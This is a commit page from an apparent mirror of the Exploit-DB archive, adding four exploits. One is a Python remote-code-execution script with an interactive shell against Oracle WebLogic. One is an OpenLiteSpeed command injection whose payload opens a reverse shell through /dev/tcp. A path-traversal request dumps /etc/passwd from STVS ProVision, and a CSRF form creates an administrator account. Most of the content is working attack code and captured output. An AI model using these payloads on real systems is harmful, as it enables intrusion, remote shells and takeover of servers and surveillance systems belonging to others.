bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-28

Browse source 
4 changes to exploits/shellcodes

Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)
STVS ProVision 5.9.10 - File Disclosure (Authenticated)
STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2021-01-28 05:01:55 +00:00
parent 9847785d4c
commit f268b6f221
5 changed files with 272 additions and 47 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

81
exploits/java/webapps/49479.py
View file

@ -1,6 +1,6 @@
# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) # Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\" # Google Dork: inurl:"/console/login/LoginForm.jsp"
# Date: 25/1/2021 # Date: 01/26/2021
# Exploit Author: CHackA0101 # Exploit Author: CHackA0101
# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html # Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
# Version: Oracle WebLogic Server, version 12.2.1.0 # Version: Oracle WebLogic Server, version 12.2.1.0
@ -16,76 +16,73 @@ import requests
import argparse import argparse
import http.client import http.client
http.client.HTTPConnection._http_vsn=10 http.client.HTTPConnection._http_vsn=10
http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\' http.client.HTTPConnection._http_vsn_str='HTTP/1.0'
parse=argparse.ArgumentParser() parse=argparse.ArgumentParser()
parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\') parse.add_argument('-u','--url',help='url')
args=parse.parse_args() args=parse.parse_args()
proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'} proxies={'http':'127.0.0.1:8080'}
cmd_ = \\\"\\\" cmd_=""
# Headers # Headers
headers = { headers = {
\\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\", "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
\\\"Accept\\\": \\\"application/json, text/plain, */*\\\", "Accept":"application/json,text/plain,*/*",
\\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\", "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
\\\"Accept-Encoding\\\": \\\"gzip, deflate\\\", "Accept-Encoding":"gzip,deflate",
\\\"Upgrade-Insecure-Requests\\\": \\\"1\\\", "Upgrade-Insecure-Requests":"1",
\\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\", "Content-Type":"application/x-www-form-urlencoded",
\\\"Cache-Control\\\": \\\"max-age=0\\\", "Cache-Control":"max-age=0",
\\\"Connection\\\": \\\"close\\\" "Connection":"close"
} }
# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: # Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\" url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\" url_=args.url+"/console/images/%252E%252E%252Fconsole.portal"
form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\"); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true); field.setAccessible(true);
Object obj = field.get(adapter); Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader(\\\"cmd\\\"); String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd}; String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd};
if (cmd != null) { if (cmd != null) {
String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next(); String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next();
weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req); weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
res.getServletOutputStream().flush(); res.getServletOutputStream().flush();
res.getWriter().write(\\\"\\\"); res.getWriter().write("");}executeThread.interrupt();");"""
}executeThread.interrupt();
\\\");\\\"\\\"\\\"
#data_ = parse.urlencode(form_data_) #data_ = parse.urlencode(form_data_)
results1=requests.get(url,headers=headers) results1=requests.get(url,headers=headers)
if results1.status_code==200: if results1.status_code==200:
print(\\\"(Load Headers... \\\\n\\\") print("(Load Headers...)\n")
print(\\\"(Data urlencode... \\\\n\\\") print("(Data urlencode...)\n")
print(\\\"(Execute exploit... \\\\n\\\") print("(Execute exploit...)\n")
print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\") print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
while True: while True:
cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\") cmd_test = input("(CHackA0101GNU/Linux)$ ")
if cmd_test == \\\"exit\\\": if cmd_test=="exit":
break break
else: else:
try: try:
cmd_ = cmd_test cmd_ = cmd_test
headers = { headers = {
\\\'cmd\\\': cmd_, 'cmd': cmd_,
\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\', 'Content-Type':'application/x-www-form-urlencoded',
\\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
\\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
\\\'Connection\\\': \\\'close\\\', 'Connection':'close',
\\\'Accept-Encoding\\\': \\\'gzip, deflate\\\', 'Accept-Encoding':'gzip,deflate',
\\\'Content-Length\\\': \\\'1244\\\', 'Content-Length':'1244',
\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\' 'Content-Type':'application/x-www-form-urlencoded'
} }
results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
print(results_) print(results_)
except: except:
pass pass
else: else:
print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\") print("(CHackA0101-GNU/Linux)$ Fail.\n")

38
exploits/multiple/webapps/49483.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on Windows 10
Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > External App > Command
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
Step 5: Graceful Restart
[POC]
POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
LSPA37FE0C43B84483E0=excYiZbpUS4%3D
name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077

121
exploits/ruby/webapps/49481.txt Normal file
View file

@ -0,0 +1,121 @@
# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch
STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
5.9.9 (build 2882-7c3b787)
5.9.7 (build 2871-a450938)
5.9.1 (build 2771-1bbed11)
5.9.0 (build 2701-6123026)
5.8.6 (build 2557-84726f7)
5.7
5.6
5.5
Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.
Desc: The NVR software ProVision suffers from an authenticated
arbitrary file disclosure vulnerability. Input passed through
the files parameter in archive download script (archive.rb) is
not properly verified before being used to download files. This
can be exploited to disclose the contents of arbitrary and sensitive
files.
Tested on: Ubuntu 14.04.3
nginx/1.12.1
nginx/1.4.6
nginx/1.1.19
nginx/0.7.65
nginx/0.3.61
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5623
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
19.01.2021
--
#1 LFI Prober (FP):
-------------------
GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: 192.168.1.17
Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Origin: http://192.168.1.17
Referer: http://192.168.1.17/archive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_stream=1; __flash__info=
Connection: close
HTTP/1.1 500 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 18 Jan 2021 23:23:30 GMT
Content-Type: text/html
Content-Length: 2727
Connection: close
<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>
#2 LFI Prober (Verified):
-------------------------
$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
provision:x:999:107::/srv/provision/provision:/bin/bash
stvs:x:1000:100::/home/stvs:/bin/bash
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
ntp:x:104:108::/home/ntp:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/bin/false
--
Errno::ENOENT No such file or directory - /var/www/index.html:
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'

66
exploits/ruby/webapps/49482.html Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch
STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)
Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
5.9.9 (build 2882-7c3b787)
5.9.7 (build 2871-a450938)
5.9.1 (build 2771-1bbed11)
5.9.0 (build 2701-6123026)
5.8.6 (build 2557-84726f7)
5.7
5.6
5.5
Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Ubuntu 14.04.3
nginx/1.12.1
nginx/1.4.6
nginx/1.1.19
nginx/0.7.65
nginx/0.3.61
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5625
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php
19.01.2021
--
<html>
<body>
<form action="http://192.168.1.17/users/create" method="POST">
<input type="hidden" name="login" value="testingus" />
<input type="hidden" name="password" value="testingus" />
<input type="hidden" name="confirm&#95;password" value="testingus" />
<input type="hidden" name="email" value="test&#64;test&#46;tld" />
<input type="hidden" name="role&#95;id" value="1" />
<input type="hidden" name="never&#95;expire" value="on" />
<input type="hidden" name="disabled&#95;acc" value="false" />
<input type="submit" value="Forge request" />
</form>
</body>
</html>

3
files_exploits.csv
View file

@ -43674,3 +43674,6 @@ id,file,description,date,author,type,platform,port
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php, 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware, 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java, 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,

Can't render this file because it is too large.